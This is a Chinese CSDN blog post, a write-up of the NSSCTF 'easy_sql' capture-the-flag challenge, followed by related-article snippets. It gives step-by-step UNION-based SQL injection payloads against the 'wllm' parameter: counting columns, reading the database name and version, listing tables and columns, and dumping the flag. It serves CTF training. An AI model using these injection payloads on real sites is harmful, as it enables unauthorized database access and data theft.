NSSCTF练习记录:[SWPUCTF 2021 新生赛]easy_sql

最新推荐文章于 2024-08-18 11:38:57 发布
最新推荐文章于 2024-08-18 11:38:57 发布
阅读量159 收藏
点赞数 2
文章标签: sql 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44396970/article/details/140826421
版权

题目:
在这里插入图片描述
查看网页发现参数为wllm
在这里插入图片描述
开始尝试sql注入

url?wllm=1

在这里插入图片描述
判断字段

url?wllm=1' order by 3--+
url?wllm=1' order by 4--+

3的时候正常回显,4的时候显示Unknown column ‘4’ in ‘order clause’,说明有3列数据

url?wllm=-1' union select 111,222,333--+

在这里插入图片描述
判断回显位在222处和333处

url?wllm=-1' union select 111,database(),version()--+

在这里插入图片描述
在回显位上,输入database和version查看数据库名和版本

url?wllm=-1' union select 111,222,group_concat(table_name) from information_schema.tables where table_schema = 'test_db'--+

在这里插入图片描述
显示出数据库test_db中所有的表名

url?wllm=-1' union select 111,222,group_concat(column_name) from information_schema.columns where table_name = 'test_tb'--+

在这里插入图片描述
查看test_tb表中的所有列

url?wllm=-1' union select 111,222,group_concat(id,flag) from  test_tb--+

在这里插入图片描述

十七v
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[NSSCTF]-Web:[SWPUCTF 2021 新生]easy_sql解析
2301_79326813的博客
02-10 949
注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。得到数据库名称就可以按顺序数据库-表-列来找flag了。有提示,参数是wllm,并且要我们输入点东西。从上图看应该是字符型漏洞,单引号字符注入。所以,我们尝试以get方式传入。报错了,说明字段数是3。有回显,但似乎没啥用。
[SWPUCTF 2021 新生]easy_sql
2301_80358831的博客
04-18 395
[SWPUCTF 2021 新生]easy_sql 题目详解
NSSCTFSWPUCTF 2021新生easy_sql
AuroraMiraitowa的博客
01-30 427
wllm=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_name=‘test_db’–+wllm=-1’ union select 1,2,3–+(将id弄成一个负数的值,使前面的语句失效)然后看看union查询是否有回显位.6.接下来查询flag输入?
NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(WEB篇)
jameshuangchuan的博客
08-08 2823
此处主要在NSSCTF平台()上开展刷题。
初级03:VI网络发布.zip_easy _labview
09-23
【标题】:“初级03:VI网络发布.zip_easy_labview” 这个标题暗示了这是一个针对初学者的课程,重点是关于LabVIEW(Laboratory Virtual Instrument Engineering Workbench)中的网络发布功能。LabVIEW是一款由美国...
easy_localization:轻松快速地将Flutter应用程序国际化
02-03
为什么选择easy_localization? :rocket: 多种语言的轻松翻译 :electric_plug: 使用以JSON,CSV,Yaml,Xml格式加载翻译 :floppy_disk: 做出React并坚持进行语言环境更改 :high_voltage: 支持复数,性别,嵌套,...
easy-tips:使用Go&PHP的代码职业中的一些提示:partying_face::partying_face::partying_face:
02-02
《 PHPer,Gopher成长之路》 V1.10 「全原创系列」记录我在成为一名PHPer,Gopher的学习过程版权申明未经专有者明确授权,禁止发行本手册及其被修改的版本。未经专有者预先授权,禁止进行作品及其衍生作品以标准...
easy-to-learnCPP.rar_easy _site:www.pudn.com
09-19
它可能包含清晰的解释、实例和练习,用平易近人的语言来解释通常被认为较难理解的C++语法。 压缩包内的文件"easy to learn C++.pdf"是主要的学习资料,很可能是一本电子书或者教程,覆盖了C++的基础到进阶内容,如...
leetcode中国-leetcode_practice:算法:flushed_face::flushed_face::flushed_face::flushed_face::flushed_face:
06-29
2. **算法训练**: 在LeetCode上,每个问题都分为不同的难度级别(Easy、Medium、Hard),涵盖了排序、搜索、动态规划、图论、二分查找、回溯等多种算法。通过实践这些题目,开发者可以提高解决问题的能力,学习如何...
SQL FOREIGN KEY 约束
m0_50736744的博客
08-16 406
SQL FOREIGN KEY 约束一个表中的 FOREIGN KEY 指向另一个表中的 UNIQUE KEY(唯一约束的键)。
Prostgresql的Timescaledb插件/扩展部署
weixin_45697805的博客
08-14 246
背景:研发需求,需要把docker部署得postgresql迁移到新的节点并要求再本地部署,提前查看数据库需要那些插件,并进行安装,docker部署的默认有插件。
4.1 SQL的起源与发展
在路上的专栏
08-16 872
SQL(结构化查询语言)是数据库管理的基石,自20世纪70年代诞生以来,它不断发展和演化,成为全球最广泛使用的数据查询语言。本文将通过生动的故事和易于理解的语言,带你了解SQL的起源、发展历程及其对现代数据库管理的深远影响。文章内容既适合数据库新手,也对专业人士具有参考价值。
SQL - 基础大汇总
心如冰清,天塌不惊
08-16 407
【代码】数据库 - 基础。
SQL - 多表查询
最新发布
心如冰清,天塌不惊
08-18 285
【代码】SQL - 多表查询。
SQLALchemy 数据的 CRUD 操作
CSDN全栈领域优秀博主,阿里云博客专家,工信部权威认证物联网技术开发工程师,曾30分钟高分通过C语言二级,两天手撸代码完成EasyX飞机大战,靠接软件私活一个月换苹果电脑
08-15 307
SQLAlchemy 是一个流行的 SQL 工具包和对象关系映射(ORM)库,用于 Python。它提供了一个高级接口来与数据库交互,允许开发者通过 Python 对象来执行 CRUD(创建、读取、更新、删除)操作,而无需编写大量的 SQL 语句。
鸿萌数据恢复服务:SQL Server 中的 GAM、SGAM、IAM,及数据库损坏的修复方法
sanyuan7783的博客
08-16 939
全局分配映射 (GAM) 负责处理数据库内的分配区,有助于在需要时识别空闲区。共享分配映射 (SGAM) 页类似于粒度图,处理数据库中特定文件组的扩展分配。索引分配映射 (IAM) 页是特殊的内部页,其作用类似于数据存储的注册表,跟踪数据页在数据库文件中的位置。
使用现有的 bitnami/postgresql:16.3.0 镜像安装pg_roaringbitmap插件
美味小鱼的杂货铺
08-14 276
你应该能看到 roaringbitmap 在已安装的扩展列表中。
hive sql 处理多层 json 数组
第一片心意的博客
08-15 782
通过 hive sql,展开包含多层 json 数组的字符串,然后获取到每个子 json 中的值。
curl: symbol lookup error: curl: undefined symbol: curl_easy_nextheader
06-02
这错误通常是由于 curl 库版本不兼容导致的。你可以尝试以下方法来解决这个问题: 1. 检查 curl 库是否已正确安装。如果已经安装,请检查其版本是否与你的代码要求的版本相同。 2. 尝试重新编译你的代码,并确保在编译过程中使用正确的 curl 库版本。 3. 如果你使用的是 Linux 系统,请尝试更新系统软件包,以确保 curl 库已更新到最新版本。 4. 如果以上方法都无法解决问题,请考虑升级到最新版本的 curl 库。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值